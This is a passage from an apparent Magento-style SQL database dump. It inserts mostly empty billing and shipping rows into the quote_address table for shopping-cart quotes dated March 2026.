(793, 579, '2026-03-22 19:18:12', '2026-03-22 19:18:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(794, 580, '2026-03-22 19:18:13', '2026-03-22 19:18:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(795, 580, '2026-03-22 19:18:13', '2026-03-22 19:18:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(796, 581, '2026-03-22 20:04:27', '2026-03-22 20:04:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(797, 581, '2026-03-22 20:04:27', '2026-03-22 20:04:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(798, 582, '2026-03-22 20:04:28', '2026-03-22 20:04:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(799, 582, '2026-03-22 20:04:28', '2026-03-22 20:04:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(800, 583, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(801, 583, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(802, 584, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(803, 584, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(804, 585, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(805, 585, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(806, 586, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(807, 586, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(808, 587, '2026-03-22 23:39:10', '2026-03-22 23:39:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(809, 587, '2026-03-22 23:39:10', '2026-03-22 23:39:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(810, 588, '2026-03-23 01:45:08', '2026-03-23 01:45:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(811, 588, '2026-03-23 01:45:08', '2026-03-23 01:45:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(812, 589, '2026-03-23 04:32:16', '2026-03-23 04:32:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(813, 589, '2026-03-23 04:32:16', '2026-03-23 04:32:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(814, 590, '2026-03-23 08:17:37', '2026-03-23 08:17:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(815, 590, '2026-03-23 08:17:37', '2026-03-23 08:17:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(816, 591, '2026-03-23 12:27:41', '2026-03-23 12:27:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(817, 591, '2026-03-23 12:27:41', '2026-03-23 12:27:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(818, 592, '2026-03-23 16:15:46', '2026-03-23 16:15:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(819, 592, '2026-03-23 16:15:46', '2026-03-23 16:15:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(820, 593, '2026-03-23 17:52:11', '2026-03-23 17:52:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(821, 593, '2026-03-23 17:52:11', '2026-03-23 17:52:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(822, 594, '2026-03-23 21:43:12', '2026-03-23 21:43:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(823, 594, '2026-03-23 21:43:12', '2026-03-23 21:43:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(824, 595, '2026-03-24 01:06:12', '2026-03-24 01:06:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(825, 595, '2026-03-24 01:06:12', '2026-03-24 01:06:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(826, 596, '2026-03-24 04:31:33', '2026-03-24 04:31:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(827, 596, '2026-03-24 04:31:33', '2026-03-24 04:31:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(828, 597, '2026-03-24 08:00:51', '2026-03-24 08:00:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(829, 597, '2026-03-24 08:00:51', '2026-03-24 08:00:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(830, 598, '2026-03-24 11:43:17', '2026-03-24 11:43:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(831, 598, '2026-03-24 11:43:17', '2026-03-24 11:43:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(832, 599, '2026-03-24 14:04:59', '2026-03-24 14:04:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(833, 599, '2026-03-24 14:04:59', '2026-03-24 14:04:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(834, 600, '2026-03-24 15:31:10', '2026-03-24 15:31:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(835, 600, '2026-03-24 15:31:10', '2026-03-24 15:31:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(836, 601, '2026-03-24 19:21:17', '2026-03-24 19:21:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(837, 601, '2026-03-24 19:21:17', '2026-03-24 19:21:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
